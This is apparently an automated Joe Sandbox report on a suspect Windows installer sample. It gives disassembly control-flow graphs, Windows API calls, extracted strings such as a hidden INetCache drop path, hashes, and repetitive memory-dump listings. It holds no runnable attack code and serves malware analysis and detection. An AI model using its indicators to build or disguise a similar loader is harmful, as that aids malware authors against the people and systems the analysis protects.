                                                                                              • String ID: C:\$VB
                                                                                              • API String ID: 2295610775-997398997
                                                                                              • Opcode ID: 0d7890576d52439fda81d3ff5c831c2ea13596096c8ebb05fd3cc094a7cb3954
                                                                                              • Instruction ID: f9ddfc5d4f3467e36225d2e4908305aa5d63d15eb4a774a72597514f161c5606
                                                                                              • Opcode Fuzzy Hash: 0d7890576d52439fda81d3ff5c831c2ea13596096c8ebb05fd3cc094a7cb3954
                                                                                              • Instruction Fuzzy Hash: 95D012719890309BC2105B386D0C84B7A589F153317528F73F42AF23E0C7388C6596AD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b5652d2671bdba289ad27ff2dbd2e251a3084f56fb371cc4bb45df86323f9214
                                                                                              • Instruction ID: 3bb9d82cab8560ee02f1719a45e7f61305cf8b7accb1ce145186acec9c03a25a
                                                                                              • Opcode Fuzzy Hash: b5652d2671bdba289ad27ff2dbd2e251a3084f56fb371cc4bb45df86323f9214
                                                                                              • Instruction Fuzzy Hash: B6F17870D04229CBDF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF44
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(?,?,00000020,00403242,00000008), ref: 004060F3
                                                                                              • LoadLibraryA.KERNELBASE(?,?,00000020,00403242,00000008), ref: 004060FE
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0040610F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                                              • String ID:
                                                                                              • API String ID: 310444273-0
                                                                                              • Opcode ID: 9fd8a9fe8f036a5891475527ba8adc4fecc6861406a6458080dad13fdc4695bd
                                                                                              • Instruction ID: aca730e0da059772988c79adabdc3e9a20cb86bb5b3cd76b20d24f00bd9ffcf2
                                                                                              • Opcode Fuzzy Hash: 9fd8a9fe8f036a5891475527ba8adc4fecc6861406a6458080dad13fdc4695bd
                                                                                              • Instruction Fuzzy Hash: 25E0CD32A081205BD7114B20AD4896773AC9FDD6413050439F905FA181D7B4BC11DFA9

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 167 403741-403759 call 4060e1 170 40375b-40376b call 405cbe 167->170 171 40376d-4037a4 call 405c44 167->171 179 4037c7-4037f0 call 403a17 call 4058ca 170->179 176 4037a6-4037b7 call 405c44 171->176 177 4037bc-4037c2 lstrcatW 171->177 176->177 177->179 185 403882-40388a call 4058ca 179->185 186 4037f6-4037fb 179->186 192 403898-4038bd LoadImageW 185->192 193 40388c-403893 call 405d99 185->193 186->185 187 403801-40381b call 405c44 186->187 191 403820-403829 187->191 191->185 194 40382b-40382f 191->194 196 40393e-403946 call 40140b 192->196 197 4038bf-4038ef RegisterClassW 192->197 193->192 201 403841-40384d lstrlenW 194->201 202 403831-40383e call 4057ef 194->202 209 403950-40395b call 403a17 196->209 210 403948-40394b 196->210 198 4038f5-403939 SystemParametersInfoW CreateWindowExW 197->198 199 403a0d 197->199 198->196 206 403a0f-403a16 199->206 203 403875-40387d call 4057c2 call 405d77 201->203 204 40384f-40385d lstrcmpiW 201->204 202->201 203->185 204->203 208 40385f-403869 GetFileAttributesW 204->208 213 40386b-40386d 208->213 214 40386f-403870 call 40580e 208->214 220 403961-40397e ShowWindow LoadLibraryW 209->220 221 4039e4-4039e5 call 4050f4 209->221 210->206 213->203 213->214 214->203 223 403980-403985 LoadLibraryW 220->223 224 403987-403999 GetClassInfoW 220->224 225 4039ea-4039ec 221->225 223->224 226 4039b1-4039d4 DialogBoxParamW call 40140b 224->226 227 40399b-4039ab GetClassInfoW RegisterClassW 224->227 228 403a06-403a08 call 40140b 225->228 229 4039ee-4039f4 225->229 233 4039d9-4039e2 call 403691 226->233 227->226 228->199 229->210 231 4039fa-403a01 call 40140b 229->231 231->210 233->206
                                                                                              APIs
                                                                                                • Part of subcall function 004060E1: GetModuleHandleA.KERNEL32(?,?,00000020,00403242,00000008), ref: 004060F3
                                                                                                • Part of subcall function 004060E1: LoadLibraryA.KERNELBASE(?,?,00000020,00403242,00000008), ref: 004060FE
                                                                                                • Part of subcall function 004060E1: GetProcAddress.KERNEL32(00000000,?), ref: 0040610F
                                                                                              • lstrcatW.KERNEL32(1033,00422698,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422698,00000000,00000006,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000,"C:\Users\user\Desktop\rFa24c148.exe"), ref: 004037C2
                                                                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\gunrack\Iglus237\unsealer,1033,00422698,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422698,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 00403842
                                                                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\gunrack\Iglus237\unsealer,1033,00422698,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422698,00000000), ref: 00403855
                                                                                              • GetFileAttributesW.KERNEL32(Call), ref: 00403860
                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\gunrack\Iglus237\unsealer), ref: 004038A9
                                                                                                • Part of subcall function 00405CBE: wsprintfW.USER32 ref: 00405CCB
                                                                                              • RegisterClassW.USER32(00428140), ref: 004038E6
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004038FE
                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403933
                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403969
                                                                                              • LoadLibraryW.KERNELBASE(RichEd20), ref: 0040397A
                                                                                              • LoadLibraryW.KERNEL32(RichEd32), ref: 00403985
                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,00428140), ref: 00403995
                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00428140), ref: 004039A2
                                                                                              • RegisterClassW.USER32(00428140), ref: 004039AB
                                                                                              • DialogBoxParamW.USER32(?,00000000,00403AE4,00000000), ref: 004039CA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: "C:\Users\user\Desktop\rFa24c148.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\gunrack\Iglus237\unsealer$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                              • API String ID: 914957316-2079698909
                                                                                              • Opcode ID: ac3d5c1165921db0f3dc03f3453a2ea74269edb9cc618bb3ebb87fcdaaa4c481
                                                                                              • Instruction ID: afa308160dea80a5d8dcbd85ebd8b3f8f2b3ac55536d549029ec0fdf087277f4
                                                                                              • Opcode Fuzzy Hash: ac3d5c1165921db0f3dc03f3453a2ea74269edb9cc618bb3ebb87fcdaaa4c481
                                                                                              • Instruction Fuzzy Hash: 5D61C471644300BAE720AF269C4AF3B3A6CEB45745F80447FF940B62E1DB799D12CA2D

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 238 403ae4-403af6 239 403c37-403c46 238->239 240 403afc-403b02 238->240 242 403c95-403caa 239->242 243 403c48-403c90 GetDlgItem * 2 call 403fbc SetClassLongW call 40140b 239->243 240->239 241 403b08-403b11 240->241 246 403b13-403b20 SetWindowPos 241->246 247 403b26-403b29 241->247 244 403cea-403cef call 404008 242->244 245 403cac-403caf 242->245 243->242 257 403cf4-403d0f 244->257 249 403cb1-403cbc call 401389 245->249 250 403ce2-403ce4 245->250 246->247 252 403b43-403b49 247->252 253 403b2b-403b3d ShowWindow 247->253 249->250 271 403cbe-403cdd SendMessageW 249->271 250->244 256 403f89 250->256 258 403b65-403b68 252->258 259 403b4b-403b60 DestroyWindow 252->259 253->252 264 403f8b-403f92 256->264 262 403d11-403d13 call 40140b 257->262 263 403d18-403d1e 257->263 267 403b6a-403b76 SetWindowLongW 258->267 268 403b7b-403b81 258->268 265 403f66-403f6c 259->265 262->263 274 403d24-403d2f 263->274 275 403f47-403f60 DestroyWindow EndDialog 263->275 265->256 272 403f6e-403f74 265->272 267->264 269 403c24-403c32 call 404023 268->269 270 403b87-403b98 GetDlgItem 268->270 269->264 276 403bb7-403bba 270->276 277 403b9a-403bb1 SendMessageW IsWindowEnabled 270->277 271->264 272->256 279 403f76-403f7f ShowWindow 272->279 274->275 280 403d35-403d82 call 405d99 call 403fbc * 3 GetDlgItem 274->280 275->265 281 403bbc-403bbd 276->281 282 403bbf-403bc2 276->282 277->256 277->276 279->256 308 403d84-403d89 280->308 309 403d8c-403dc8 ShowWindow KiUserCallbackDispatcher call 403fde EnableWindow 280->309 285 403bed-403bf2 call 403f95 281->285 286 403bd0-403bd5 282->286 287 403bc4-403bca 282->287 285->269 290 403c0b-403c1e SendMessageW 286->290 292 403bd7-403bdd 286->292 287->290 291 403bcc-403bce 287->291 290->269 291->285 296 403bf4-403bfd call 40140b 292->296 297 403bdf-403be5 call 40140b 292->297 296->269 305 403bff-403c09 296->305 306 403beb 297->306 305->306 306->285 308->309 312 403dca-403dcb 309->312 313 403dcd 309->313 314 403dcf-403dfd GetSystemMenu EnableMenuItem SendMessageW 312->314 313->314 315 403e12 314->315 316 403dff-403e10 SendMessageW 314->316 317 403e18-403e56 call 403ff1 call 405d77 lstrlenW call 405d99 SetWindowTextW call 401389 315->317 316->317 317->257 326 403e5c-403e5e 317->326 326->257 327 403e64-403e68 326->327 328 403e87-403e9b DestroyWindow 327->328 329 403e6a-403e70 327->329 328->265 331 403ea1-403ece CreateDialogParamW 328->331 329->256 330 403e76-403e7c 329->330 330->257 332 403e82 330->332 331->265 333 403ed4-403f2b call 403fbc GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 331->333 332->256 333->256 338 403f2d-403f40 ShowWindow call 404008 333->338 340 403f45 338->340 340->265
                                                                                              APIs
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B20
                                                                                              • ShowWindow.USER32(?), ref: 00403B3D
                                                                                              • DestroyWindow.USER32 ref: 00403B51
                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403B6D
                                                                                              • GetDlgItem.USER32(?,?), ref: 00403B8E
                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403BA2
                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403BA9
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403C57
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403C61
                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403C7B
                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403CCC
                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403D72
                                                                                              • ShowWindow.USER32(00000000,?), ref: 00403D93
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403DA5
                                                                                              • EnableWindow.USER32(?,?), ref: 00403DC0
                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DD6
                                                                                              • EnableMenuItem.USER32(00000000), ref: 00403DDD
                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403DF5
                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403E08
                                                                                              • lstrlenW.KERNEL32(00422698,?,00422698,004281A0), ref: 00403E31
                                                                                              • SetWindowTextW.USER32(?,00422698), ref: 00403E45
                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00403F79
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 3282139019-0
                                                                                              • Opcode ID: b121bc2ed9969a9fb6c21bfc6921f06f0261ed8b33c3b4db69171897c6bfb89c
                                                                                              • Instruction ID: d7c36ab4ba1e77d3c514d2e075e7bf05f8385f4f0eed445bed2eaaef7d4a98f3
                                                                                              • Opcode Fuzzy Hash: b121bc2ed9969a9fb6c21bfc6921f06f0261ed8b33c3b4db69171897c6bfb89c
                                                                                              • Instruction Fuzzy Hash: 71C1AE71A04205ABEB216F61ED45D3B7A7CFB49306F40053EF501B11E1CB79A952DB2E

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 341 402d69-402db7 GetTickCount GetModuleFileNameW call 4059e3 344 402dc3-402df1 call 405d77 call 40580e call 405d77 GetFileSize 341->344 345 402db9-402dbe 341->345 353 402df7 344->353 354 402ede-402eec call 402d05 344->354 346 402f9b-402f9f 345->346 356 402dfc-402e13 353->356 360 402f41-402f46 354->360 361 402eee-402ef1 354->361 358 402e15 356->358 359 402e17-402e20 call 40319e 356->359 358->359 367 402e26-402e2d 359->367 368 402f48-402f50 call 402d05 359->368 360->346 363 402ef3-402f0b call 4031b4 call 40319e 361->363 364 402f15-402f3f GlobalAlloc call 4031b4 call 402fa2 361->364 363->360 387 402f0d-402f13 363->387 364->360 392 402f52-402f63 364->392 372 402ea9-402ead 367->372 373 402e2f-402e43 call 40599e 367->373 368->360 377 402eb7-402ebd 372->377 378 402eaf-402eb6 call 402d05 372->378 373->377 390 402e45-402e4c 373->390 383 402ecc-402ed6 377->383 384 402ebf-402ec9 call 40618f 377->384 378->377 383->356 391 402edc 383->391 384->383 387->360 387->364 390->377 396 402e4e-402e55 390->396 391->354 393 402f65 392->393 394 402f6b-402f70 392->394 393->394 397 402f71-402f77 394->397 396->377 398 402e57-402e5e 396->398 397->397 399 402f79-402f94 SetFilePointer call 40599e 397->399 398->377 400 402e60-402e67 398->400 404 402f99 399->404 400->377 401 402e69-402e89 400->401 401->360 403 402e8f-402e93 401->403 405 402e95-402e99 403->405 406 402e9b-402ea3 403->406 404->346 405->391 405->406 406->377 407 402ea5-402ea7 406->407 407->377
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 00402D7A
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\rFa24c148.exe,00000400,?,?,?,00000000,00403425,?), ref: 00402D96
                                                                                                • Part of subcall function 004059E3: GetFileAttributesW.KERNELBASE(00000003,00402DA9,C:\Users\user\Desktop\rFa24c148.exe,80000000,00000003,?,?,?,00000000,00403425,?), ref: 004059E7
                                                                                                • Part of subcall function 004059E3: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403425,?), ref: 00405A09
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rFa24c148.exe,C:\Users\user\Desktop\rFa24c148.exe,80000000,00000003,?,?,?,00000000,00403425,?), ref: 00402DE2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                              • String ID: "C:\Users\user\Desktop\rFa24c148.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\rFa24c148.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$P~A$soft
                                                                                              • API String ID: 4283519449-3143687936
                                                                                              • Opcode ID: deaa8614282d3ada7b3d30178f8022547566b7f059afc153b6d9a88955226618
                                                                                              • Instruction ID: 9a0bc50dc50940ee2abb7c3ced767a556554b68a68c4a60a299fb88064fb1f26
                                                                                              • Opcode Fuzzy Hash: deaa8614282d3ada7b3d30178f8022547566b7f059afc153b6d9a88955226618
                                                                                              • Instruction Fuzzy Hash: 88512871900205ABDB209F65DE89BAF7BB8EB14358F10403BF904B62D1C7B88D418BAD

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
